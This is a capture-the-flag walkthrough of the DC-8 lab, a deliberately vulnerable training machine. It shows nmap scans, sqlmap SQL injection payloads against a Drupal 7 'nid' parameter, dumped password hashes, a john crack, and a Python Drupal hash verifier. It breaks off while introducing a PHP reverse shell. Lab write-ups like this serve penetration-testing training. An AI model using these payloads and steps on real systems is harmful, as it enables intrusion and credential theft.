Lluna's Pure land.

DC-8

0x00. Official description

DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This challenge is a bit of a hybrid between being an actual challenge, and being a “proof of concept” as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.

The “proof of concept” portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.

The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.

You probably wouldn’t even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it’s definitely there and doing it’s job.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

0x01. The usual nmap host discovery

From the results, .1 is the gateway, .2 is the host machine and .6 is Kali, so .3 must be our target.

root@JIYE:~/vulnhub/dc8# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 20:37 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0029s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00051s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.3
Host is up (0.00033s latency).
MAC Address: 00:0C:29:57:6A:A6 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.06 seconds
root@JIYE:~/vulnhub/dc8#

0x02. Continue with nmap to scan services and ports

Ports 22 and 80 are open, and the site runs Drupal 7.

root@JIYE:~/vulnhub/dc8# nmap -sC -sV -v 192.168.1.3 -oN nmap.demo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 20:38 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating ARP Ping Scan at 20:38
Scanning 192.168.1.3 [1 port]
Completed ARP Ping Scan at 20:38, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:38
Completed Parallel DNS resolution of 1 host. at 20:38, 0.03s elapsed
Initiating SYN Stealth Scan at 20:38
Scanning 192.168.1.3 [1000 ports]
Discovered open port 80/tcp on 192.168.1.3
Discovered open port 22/tcp on 192.168.1.3
Completed SYN Stealth Scan at 20:38, 0.08s elapsed (1000 total ports)
Initiating Service scan at 20:38
Scanning 2 services on 192.168.1.3
Completed Service scan at 20:38, 6.71s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.3.
Initiating NSE at 20:38
Completed NSE at 20:38, 1.27s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.02s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Nmap scan report for 192.168.1.3
Host is up (0.000092s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:57:6A:A6 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.75 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.036KB)
root@JIYE:~/vulnhub/dc8#

0x03. Port 80 is open, so visit it directly

Crawling the site by hand, there appears to be a SQL injection point.

Trying to close the quote triggers an error.

Checking robots.txt reveals the changelog and the admin login URL.

0x04. Dump the database names

The database is d7db.

root@JIYE:~/vulnhub/dc8# sqlmap -u "http://192.168.1.3/?nid=2" --dbs
___
__H__
___ ___[.]_____ ___ ___ {1.4.8#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:57:11 /2020-08-30/

[20:57:11] [INFO] testing connection to the target URL
[20:57:11] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:57:11] [INFO] testing if the target URL content is stable
[20:57:11] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[20:57:13] [INFO] testing if GET parameter 'nid' is dynamic
[20:57:14] [WARNING] GET parameter 'nid' does not appear to be dynamic
[20:57:14] [INFO] heuristic (basic) test shows that GET parameter 'nid' might be injectable (possible DBMS: 'MySQL')
[20:57:14] [INFO] testing for SQL injection on GET parameter 'nid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:57:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:57:30] [WARNING] reflective value(s) found and filtering out
[20:57:30] [INFO] GET parameter 'nid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Status message")
[20:57:30] [INFO] testing 'Generic inline queries'
[20:57:30] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:57:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:57:30] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:57:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:57:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[20:57:30] [WARNING] potential permission problems detected ('command denied')
[20:57:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[20:57:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:57:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:57:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:57:30] [INFO] GET parameter 'nid' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:57:30] [INFO] testing 'MySQL inline queries'
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:57:30] [WARNING] time-based comparison requires larger statistical model, please wait........... (done)
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:57:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:57:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:57:40] [INFO] GET parameter 'nid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:57:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:57:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:57:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:57:40] [INFO] target URL appears to have 1 column in query
[20:57:41] [INFO] GET parameter 'nid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=2 AND 2744=2744

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=2 AND (SELECT 3788 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3788=3788,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=2 AND (SELECT 8090 FROM (SELECT(SLEEP(5)))vgpi)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-6424 UNION ALL SELECT CONCAT(0x7162766b71,0x756e745669426f51657542734855636c72567a796d6a4f4f4642425451696b77557152776b6f616c,0x716a6a7671)-- -
---
[20:57:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:57:48] [INFO] fetching database names
[20:57:48] [INFO] retrieved: 'd7db'
[20:57:48] [INFO] retrieved: 'information_schema'
available databases [2]:
[*] d7db
[*] information_schema

[20:57:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[20:57:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.3'

[*] ending @ 20:57:48 /2020-08-30/

root@JIYE:~/vulnhub/dc8#

0x05. Dump the tables

Locate the users table.

root@JIYE:~/vulnhub/dc8# sqlmap -u "http://192.168.1.3/?nid=2" -D "d7db" --tables
___
__H__
___ ___["]_____ ___ ___ {1.4.8#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:59:52 /2020-08-30/

[20:59:53] [INFO] resuming back-end DBMS 'mysql'
[20:59:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=2 AND 2744=2744

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=2 AND (SELECT 3788 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3788=3788,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=2 AND (SELECT 8090 FROM (SELECT(SLEEP(5)))vgpi)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-6424 UNION ALL SELECT CONCAT(0x7162766b71,0x756e745669426f51657542734855636c72567a796d6a4f4f4642425451696b77557152776b6f616c,0x716a6a7671)-- -
---
[20:59:53] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:59:53] [INFO] fetching tables for database: 'd7db'
[20:59:53] [INFO] retrieved: 'actions'
[20:59:53] [INFO] retrieved: 'authmap'
[20:59:53] [INFO] retrieved: 'batch'
[20:59:53] [INFO] retrieved: 'block'
[20:59:53] [INFO] retrieved: 'block_custom'
[20:59:53] [INFO] retrieved: 'block_node_type'
[20:59:53] [INFO] retrieved: 'block_role'
[20:59:53] [INFO] retrieved: 'blocked_ips'
[20:59:54] [INFO] retrieved: 'cache'
[20:59:54] [INFO] retrieved: 'cache_block'
[20:59:54] [INFO] retrieved: 'cache_bootstrap'
[20:59:54] [INFO] retrieved: 'cache_field'
[20:59:54] [INFO] retrieved: 'cache_filter'
[20:59:54] [INFO] retrieved: 'cache_form'
[20:59:54] [INFO] retrieved: 'cache_image'
[20:59:54] [INFO] retrieved: 'cache_menu'
[20:59:54] [INFO] retrieved: 'cache_page'
[20:59:54] [INFO] retrieved: 'cache_path'
[20:59:54] [INFO] retrieved: 'cache_views'
[20:59:54] [INFO] retrieved: 'cache_views_data'
[20:59:54] [INFO] retrieved: 'ckeditor_input_format'
[20:59:54] [INFO] retrieved: 'ckeditor_settings'
[20:59:54] [INFO] retrieved: 'ctools_css_cache'
[20:59:54] [INFO] retrieved: 'ctools_object_cache'
[20:59:54] [INFO] retrieved: 'date_format_locale'
[20:59:54] [INFO] retrieved: 'date_format_type'
[20:59:54] [INFO] retrieved: 'date_formats'
[20:59:54] [INFO] retrieved: 'field_config'
[20:59:54] [INFO] retrieved: 'field_config_instance'
[20:59:54] [INFO] retrieved: 'field_data_body'
[20:59:54] [INFO] retrieved: 'field_data_field_image'
[20:59:54] [INFO] retrieved: 'field_data_field_tags'
[20:59:54] [INFO] retrieved: 'field_revision_body'
[20:59:54] [INFO] retrieved: 'field_revision_field_image'
[20:59:54] [INFO] retrieved: 'field_revision_field_tags'
[20:59:54] [INFO] retrieved: 'file_managed'
[20:59:54] [INFO] retrieved: 'file_usage'
[20:59:54] [INFO] retrieved: 'filter'
[20:59:54] [INFO] retrieved: 'filter_format'
[20:59:54] [INFO] retrieved: 'flood'
[20:59:54] [INFO] retrieved: 'history'
[20:59:54] [INFO] retrieved: 'image_effects'
[20:59:54] [INFO] retrieved: 'image_styles'
[20:59:54] [INFO] retrieved: 'menu_custom'
[20:59:54] [INFO] retrieved: 'menu_links'
[20:59:54] [INFO] retrieved: 'menu_router'
[20:59:54] [INFO] retrieved: 'node'
[20:59:54] [INFO] retrieved: 'node_access'
[20:59:54] [INFO] retrieved: 'node_revision'
[20:59:54] [INFO] retrieved: 'node_type'
[20:59:54] [INFO] retrieved: 'queue'
[20:59:54] [INFO] retrieved: 'rdf_mapping'
[20:59:54] [INFO] retrieved: 'registry'
[20:59:54] [INFO] retrieved: 'registry_file'
[20:59:54] [INFO] retrieved: 'role'
[20:59:54] [INFO] retrieved: 'role_permission'
[20:59:54] [INFO] retrieved: 'search_dataset'
[20:59:54] [INFO] retrieved: 'search_index'
[20:59:54] [INFO] retrieved: 'search_node_links'
[20:59:54] [INFO] retrieved: 'search_total'
[20:59:55] [INFO] retrieved: 'semaphore'
[20:59:55] [INFO] retrieved: 'sequences'
[20:59:55] [INFO] retrieved: 'sessions'
[20:59:55] [INFO] retrieved: 'shortcut_set'
[20:59:55] [INFO] retrieved: 'shortcut_set_users'
[20:59:55] [INFO] retrieved: 'site_messages_table'
[20:59:55] [INFO] retrieved: 'system'
[20:59:55] [INFO] retrieved: 'taxonomy_index'
[20:59:55] [INFO] retrieved: 'taxonomy_term_data'
[20:59:55] [INFO] retrieved: 'taxonomy_term_hierarchy'
[20:59:55] [INFO] retrieved: 'taxonomy_vocabulary'
[20:59:55] [INFO] retrieved: 'url_alias'
[20:59:55] [INFO] retrieved: 'users'
[20:59:55] [INFO] retrieved: 'users_roles'
[20:59:55] [INFO] retrieved: 'variable'
[20:59:55] [INFO] retrieved: 'views_display'
[20:59:55] [INFO] retrieved: 'views_view'
[20:59:55] [INFO] retrieved: 'watchdog'
[20:59:55] [INFO] retrieved: 'webform'
[20:59:55] [INFO] retrieved: 'webform_component'
[20:59:55] [INFO] retrieved: 'webform_conditional'
[20:59:55] [INFO] retrieved: 'webform_conditional_actions'
[20:59:55] [INFO] retrieved: 'webform_conditional_rules'
[20:59:55] [INFO] retrieved: 'webform_emails'
[20:59:55] [INFO] retrieved: 'webform_last_download'
[20:59:55] [INFO] retrieved: 'webform_roles'
[20:59:55] [INFO] retrieved: 'webform_submissions'
[20:59:55] [INFO] retrieved: 'webform_submitted_data'
Database: d7db
[88 tables]
+-----------------------------+
| filter |
| system |
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+

[20:59:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.3'

[*] ending @ 20:59:55 /2020-08-30/

root@JIYE:~/vulnhub/dc8#

0x06. Dump the columns

root@JIYE:~/vulnhub/dc8# sqlmap -u "http://192.168.1.3/?nid=2" -D "d7db" -T "users" --columns
___
__H__
___ ___[.]_____ ___ ___ {1.4.8#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:04:47 /2020-08-30/

[21:04:47] [INFO] resuming back-end DBMS 'mysql'
[21:04:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=2 AND 2744=2744

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=2 AND (SELECT 3788 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3788=3788,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=2 AND (SELECT 8090 FROM (SELECT(SLEEP(5)))vgpi)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-6424 UNION ALL SELECT CONCAT(0x7162766b71,0x756e745669426f51657542734855636c72567a796d6a4f4f4642425451696b77557152776b6f616c,0x716a6a7671)-- -
---
[21:04:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[21:04:47] [INFO] fetching columns for table 'users' in database 'd7db'
[21:04:47] [INFO] retrieved: 'uid','int(10) unsigned'
[21:04:47] [INFO] retrieved: 'name','varchar(60)'
[21:04:47] [INFO] retrieved: 'pass','varchar(128)'
[21:04:47] [INFO] retrieved: 'mail','varchar(254)'
[21:04:47] [INFO] retrieved: 'theme','varchar(255)'
[21:04:48] [INFO] retrieved: 'signature','varchar(255)'
[21:04:48] [INFO] retrieved: 'signature_format','varchar(255)'
[21:04:48] [INFO] retrieved: 'created','int(11)'
[21:04:48] [INFO] retrieved: 'access','int(11)'
[21:04:48] [INFO] retrieved: 'login','int(11)'
[21:04:48] [INFO] retrieved: 'status','tinyint(4)'
[21:04:48] [INFO] retrieved: 'timezone','varchar(32)'
[21:04:48] [INFO] retrieved: 'language','varchar(12)'
[21:04:48] [INFO] retrieved: 'picture','int(11)'
[21:04:48] [INFO] retrieved: 'init','varchar(254)'
[21:04:48] [INFO] retrieved: 'data','longblob'
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| language | varchar(12) |
| access | int(11) |
| created | int(11) |
| data | longblob |
| init | varchar(254) |
| login | int(11) |
| mail | varchar(254) |
| name | varchar(60) |
| pass | varchar(128) |
| picture | int(11) |
| signature | varchar(255) |
| signature_format | varchar(255) |
| status | tinyint(4) |
| theme | varchar(255) |
| timezone | varchar(32) |
| uid | int(10) unsigned |
+------------------+------------------+

[21:04:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.3'

[*] ending @ 21:04:48 /2020-08-30/

root@JIYE:~/vulnhub/dc8#

0x06. Dump the data, but it is hashed

root@JIYE:~/vulnhub/dc8# sqlmap -u "http://192.168.1.3/?nid=2" -D "d7db" -T "users" -C "name,pass" --dump
___
__H__
___ ___[.]_____ ___ ___ {1.4.8#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:06:17 /2020-08-30/

[21:06:17] [INFO] resuming back-end DBMS 'mysql'
[21:06:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=2 AND 2744=2744

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=2 AND (SELECT 3788 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3788=3788,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=2 AND (SELECT 8090 FROM (SELECT(SLEEP(5)))vgpi)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-6424 UNION ALL SELECT CONCAT(0x7162766b71,0x756e745669426f51657542734855636c72567a796d6a4f4f4642425451696b77557152776b6f616c,0x716a6a7671)-- -
---
[21:06:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[21:06:17] [INFO] fetching entries of column(s) 'name, pass' for table 'users' in database 'd7db'
[21:06:17] [INFO] retrieved: '',''
[21:06:18] [INFO] retrieved: 'admin','$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'
[21:06:18] [INFO] retrieved: 'john','$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
Database: d7db
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+

[21:06:18] [INFO] table 'd7db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.3/dump/d7db/users.csv'
[21:06:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.3'

[*] ending @ 21:06:18 /2020-08-30/

root@JIYE:~/vulnhub/dc8#

0x07. Cracking with john

First, build the hash file for john.

root@JIYE:~/vulnhub/dc8# cat user.dic 
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
root@JIYE:~/vulnhub/dc8#

Crack it; john's password turns out to be turtle.

root@JIYE:~/vulnhub/dc8# john user.txt /usr/share/wordlists/rockyou.txt
···
(n lines omitted here)
···
root@JIYE:~/vulnhub/dc8# john user.txt /usr/share/wordlists/rockyou.txt --show
john:turtle
Session aborted
root@JIYE:~/vulnhub/dc8#
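
To see what the $S$ strings above actually encode, and why john has to compute 2^15 SHA-512 rounds for every guess, here is a Python reimplementation of Drupal 7's password check (the `_password_crypt` logic from `includes/password.inc`). This is an added example, not code from the original post or from Drupal; the only inputs are the two hashes dumped above and the password the post recovered.

```python
"""Drupal 7 password-hash check, reimplemented in Python as a worked example.

A stored hash such as $S$DqupvJbx... is 55 chars:
  "$S$"   algorithm tag (S = SHA-512)
  1 char  cost, indexed into ITOA64 -> log2(iteration count)
  8 char  salt
  43 char truncated phpass-style base64 of the final digest
"""
import hashlib
import hmac
from typing import Dict, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55               # DRUPAL_HASH_LENGTH
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30

# Taken from the sqlmap dump on this page (name -> stored hash).
DUMPED: Dict[str, str] = {
    "admin": "$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z",
    "john": "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF",
}


def b64_encode(data: bytes) -> str:
    """phpass/Drupal base64: little-endian 3-byte groups over ITOA64, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> Optional[dict]:
    """Split the 12-char setting prefix into its parts; None if malformed."""
    setting = stored[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    if setting[1] != "S" or setting[3] not in ITOA64:
        return None
    log2 = ITOA64.index(setting[3])
    if not MIN_COUNT_LOG2 <= log2 <= MAX_COUNT_LOG2:
        return None
    return {"setting": setting, "cost_log2": log2,
            "iterations": 1 << log2, "salt": setting[4:12]}


def drupal_hash(password: str, stored_or_setting: str) -> Optional[str]:
    """Recompute _password_crypt('sha512', password, setting) for a stored hash."""
    if len(password) > 512:            # Drupal refuses oversized passwords (DoS guard)
        return None
    parts = parse_setting(stored_or_setting)
    if parts is None:
        return None
    pw = password.encode()
    digest = hashlib.sha512(parts["salt"].encode() + pw).digest()
    for _ in range(parts["iterations"]):   # the cost factor: 2**log2 extra rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (parts["setting"] + b64_encode(digest))[:HASH_LENGTH]


def verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored $S$ hash."""
    if len(stored) != HASH_LENGTH:
        return False
    computed = drupal_hash(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    for name, h in DUMPED.items():
        print(name, parse_setting(h))
    # The password the post recovered with john.
    print("john / turtle ->", verify("turtle", DUMPED["john"]))
```

The cost character `D` sits at index 15 of ITOA64, so each guess costs 32768 extra SHA-512 rounds; raising that cost is the only knob a site owner has once the hashes are exfiltrated.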

0x08. Log in

After looking around, we find a place where PHP code can be written.

0x09. Reverse shell

This time we use /usr/share/webshells/php/php-reverse-shell.php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
